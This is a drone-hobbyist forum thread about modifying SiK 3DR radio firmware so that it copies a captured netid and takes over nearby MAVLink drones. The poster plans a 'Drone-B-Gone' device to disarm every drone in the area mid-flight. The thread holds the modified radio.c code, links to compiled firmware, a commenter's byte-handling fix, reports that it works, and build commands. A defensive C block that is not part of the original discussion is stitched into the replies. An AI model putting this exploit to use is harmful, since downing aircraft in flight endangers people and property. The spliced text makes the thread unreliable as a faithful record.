HopeRF-TRP 3DR MavLink Attack


Project Status;          Design

Project Progress;       [∎∎∎                       ]


Once the project is complete I will be publishing it here


My write-up on my Blog www.googlex.co.uk/blog...


Hello DiyDrone.com Community!


My name is Jack and I'm currently working on a project to do with an exploit recently discovered (Oct 2015) in the MavLink Protocol.

First off the Exploit;

The exploit is to do with the radios' method of authentication: they use the header 'Net_Id' to identify themselves to the other radios during transmission of data.

Within the SiK firmware for the SiLabs Si1000 ISM radio there is a file named "radio.c". Within this file there is some code that pulls the device's 'Net_Id' and checks it against incoming data packets to see if they are meant for the radio that is receiving them.

This is the original code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
debug("netid %x %x\n",
(unsigned)gout[0],
(unsigned)gout[1]);
goto failed;
}

However, some guy has been able to modify this code so that when the radio receives a data packet it reads its 'Net_Id' and sets the 'Net_Id' of the radio that received the packet to the same as the one that was just received. The radio is then able to issue a command to the drone that it has just stolen the 'Net_Id' from, such as "CMD_DISARM", which would in turn disarm the drone mid-flight!

Here is the "Modified" Code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
/* Mod */
// Set our radio to use the captured packets
NetID param_set(PARAM_NETID, gout[0]))
// Save the value to flash
param_save();
// To read the new value we need to reboot. Rebooting
RSTSRC |= (1 << 4);
/* End of Mod*/
}

My problem(s) are as follows.

I can't compile the modded firmware as all of my Linux computers refuse to install MonoDevelop :/
I would like to have this running on a standalone Hope-RF HM-TRP 433 chip that is connected to an Arduino. The Arduino would have a display that, when a button is pressed, shows something like LINE1 "Drone-B-Gone" LINE2 "Disarming all drones in the area!", and the Arduino would use Serial.Send() to send the command to the Hope-RF chip that contains the packet "CMD_DISARM" that would disarm the quad in flight.
I have no way of flashing the Hope-RF HM-TRP chip! I read somewhere that an Arduino Uno could be used, however I have lost that link :(
I have NO Arduino experience so I don't even know how I would start coding something like this.


And now for my Questions!
1. Can I link several HopeRF HM-TRP modules together?? What I mean by this is: could I possibly have 434/868/915 modules with the modded code all linked together with the Tx and Rx pins and the same power source (DUH, with different antennas) so that when the button is pressed, no matter what telemetry band the drone is using, it WILL cover it?
2. Can someone please send me in the right direction on how I can achieve what I have asked above with an Arduino??

All help is greatly appreciated!

Links to prior Research

http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent-it/

https://github.com/Dronecode/SiK

http://www.shellntel.com/blog/2015/9/25/drone-code-execution

http://rc-fpv.pl/viewtopic.php?t=8011

Obviously I am not doing this with malicious intent... ;)

Thanks a lot guys!!!

Peace out ~Jack

<-------------------------------- UPDATE-1 ----------------------------------->

Having second thoughts on how I should do this.

I am pondering as to whether I should use an Android tablet with the USB OTG wire.

This way (as Andre K pointed out) I would be showing more skills, as I am a confident Android developer, so I could possibly make my own app that gives me a multitude of functions such as Follow Me, Disable, Manual Control, RTH//RTL, Set New Home and go there; also I could do flight mode change. I think this would possibly help me demonstrate more skills?

What do you guys think? Start your response with UPDATE-1 ;)

~Jack

<------------------------------ UPDATE-1 END ------------------------------->

<-------------------------------- UPDATE-2 ----------------------------------->

Finally getting somewhere!

A HUGE Thanks to Marcin Krawczyk for recommending Fedora to me!

I have finally got the HM_TRP firmware package compiled :)

It is attached below. This is the FW WITH the mod :)

LINK TO FW FILE  <-- Not the correct upload!

I pulled an all-nighter doing this :S

~Jack

===

SUB UPDATE!

I accidentally uploaded the wrong file, this is the full dst output file :)

LINK TO FW FILE

===

<------------------------------ UPDATE-2 END ------------------------------->


By Jack Rogers


© InkyHacker 2016


hm_trp.zip

Firmware.zip


Replies

  • Dear Andre,

    Obviously this essay is only a small part of the project, I explain:

    I am trying to develop some method of authentication between GCS and UAV. In the study of the state of the art, I have described the current communication protocols and explained why they are insecure. I thought it was a good idea to make a demo of how easy it was to take control of a UAV.

    You are very wrong with my intentions, they are just the opposite of what you think.

    I hope to make it clear that my intentions are not malicious.

    Thanks for your answer.

  • If that's a "career" project, you should have higher standards than years-old plagiarism.

    The thing is 2 years old at least, and the simple approach above will not even work for all setup options.

    Moreover, simple disarm is not about preventing anything, more than a malicious attempt to cause an accident.

    http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent...

    Luckily, bad ideas like publishing the code above are history with Mavlink 2.0 & encryption.

  • Hi Jack,

    I'm working on my final career project; it's about communications and security between UAVs.

    I'm trying to develop an anti-drone system based on your idea, demonstrating the insecurity of the MAVLink 3DR link.

    I can appreciate that you have great knowledge. Could you please guide me a little?

    Thanks in advance

  • Believe the code should change to :

    lsb = gout[0]    uint8_t 

    msb = gout[1]  uint8_t

    all parameters = uint32_t

    NetID param_set(PARAM_NETID, (gout[1] \<\< 8 ) | (gout[0] & 0xff)))

     or possibly              gout[0] | (((uint16_t)gout[1]) \<\< 8)

    (The back slashes should be removed from the code,  it should be "less than" x2)
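Added example (not SiK firmware code and not from any poster here): a model of the radio.c netid filter with the 16-bit NETID split into gout[0] (low byte) and gout[1] (high byte) as the comment above describes; function names and the sample netids are assumed. It shows why both header bytes must be compared, and keeps a counter a defender can watch for packets arriving with a foreign netid.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Split a 16-bit netid into the two header bytes, low byte first. */
void netid_to_header(uint16_t netid, uint8_t hdr[2]) {
    hdr[0] = (uint8_t)(netid & 0xff);   /* lsb, carried in gout[0] */
    hdr[1] = (uint8_t)(netid >> 8);     /* msb, carried in gout[1] */
}

/* Rebuild the 16-bit netid carried in a decoded header. */
uint16_t header_to_netid(const uint8_t hdr[2]) {
    return (uint16_t)(hdr[0] | ((uint16_t)hdr[1] << 8));
}

/* Packets seen with a netid other than ours. A sudden rise in this
 * rate is a cheap signal that something is probing the link. */
static unsigned foreign_packets = 0;

unsigned foreign_packet_count(void) { return foreign_packets; }

/* The check radio.c performs: accept only packets for our own netid.
 * The radio's netid is never changed by incoming data. */
bool accept_header(const uint8_t hdr[2], uint16_t our_netid) {
    uint8_t ours[2];
    netid_to_header(our_netid, ours);
    if (hdr[0] != ours[0] || hdr[1] != ours[1]) {
        foreign_packets++;
        return false;
    }
    return true;
}

int main(void) {
    uint8_t hdr[2];
    /* Constructed sample: our radio uses netid 327 (0x0147), a high-range
     * value like the one a commenter reported trouble with. */
    netid_to_header(327, hdr);
    printf("netid 327 -> header %02x %02x accept=%d\n",
           hdr[0], hdr[1], accept_header(hdr, 327));
    /* Netid 71 (0x0047) shares the low byte with 327; a check that looked
     * only at gout[0] would wrongly accept it. */
    netid_to_header(71, hdr);
    printf("netid 71  -> header %02x %02x accept=%d\n",
           hdr[0], hdr[1], accept_header(hdr, 327));
    printf("foreign packets seen: %u\n", foreign_packet_count());
    return 0;
}
```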

     

  • Hi, the firmware worked for me for network IDs in the low range < 30 (haven't tested all) but not in the high range, around 327.

    The modified firmware's radio light went solid, but not the normal radio's; also the config util could not get parameters from the modified radio?

    Does anybody have a clue why this would happen?

  • Interesting project, but it's been done before.  It truly is trivial to muck around with other people's clear text transmissions.

    Publishing something like this could spur on some rapid/panic firmware development.

    The Si1000 is capable of doing 128 and 256-bit AES encryption.  Example source from SiLabs exists.  The problem is technical only in the respect that encryption was not the chosen path for firmware dev and it would take a lot of reworking to strip it back down to the point that the resources are available.

    The real limitation is that it would be illegal to encrypt the transmissions.  You can't transmit encrypted in the ham bands.  Since most people aren't legal in the first place, maybe that's not that big of a deal.

    Kali linux is pretty obviously what you should be using.  The 32-bit official VM works great for me in vmware on 64-bit Win7.  Just use "sudo apt-get install sdcc" and everything should work fine.  Only problem for me is one of the RFD targets throws an error or warning.  No problem for all the others.

    One interesting thing about these chip radios is that there's hundreds of settings to play around with.  Anyone with security in mind can simply change almost any of these in the firmware and be immune to the sort of attack you suggest.

    It would also be fairly trivial to implement an authentication scheme that would put this sort of attack just outside the capabilities of 99.9% of the would-be hackers out there.

    What would be kind of fun would be a simple "drone scanner" that would intercept and display the telemetry from any drones in the area.  That would actually be legal and far more fun than simply crashing people's gear for no reason.  With some good antennas, a couple 3DR radios, and a couple video receivers you could be getting flight data and video quite easily.  With more and more drones out there you might end up with multiple channels of drone video you can switch between. 

    • I LOVE the idea, "Drone Scanner!" I may work on this!

      We'll see what happens in the near future, but I still haven't received my radios :/

      • There's probably a fair bit of work to do in order to get that working.

        Almost every setting changes everything, so having the netid doesn't nail down much.  The channels will still be completely different if you use other than default frequency ranges or different numbers of channels.  Most of the other settings shouldn't affect channel frequencies, but would probably prevent communication.

        As a ham, I should be able to receive data broadcast on ham frequencies without any untoward efforts.  So I'm kind of interested in how I can quickly lock onto FHSS signals.

        I'm thinking that if two channels can be determined then the netid, frequency range, and number of channels can probably be computed.

        • My thoughts exactly Jake!

          I'm still struggling with the compile environment for the radios. I have it almost up and running (some problem with the version of make.exe I'm running; doing it all under Windows).

          Once I have enough spare time...

          • I tried to compile under windows.  It should work, but after an hour or so I gave up.

            Go to the Bactrack/Kali linux download page and find the VM image (I used 32-bit on 64-bit windows).

            Then just run: sudo apt-get install sdcc

            I ran the following to update everything first...

            sudo apt-get update # Fetches the list of available updates
            sudo apt-get upgrade # Strictly upgrades the current packages
            sudo apt-get dist-upgrade # Installs updates (new ones)
            sudo apt-get autoremove # Removes junk (needs root like the others)

            sudo apt-get install sdcc

            make install~radio~hm_trp

            Worked like a charm for me.
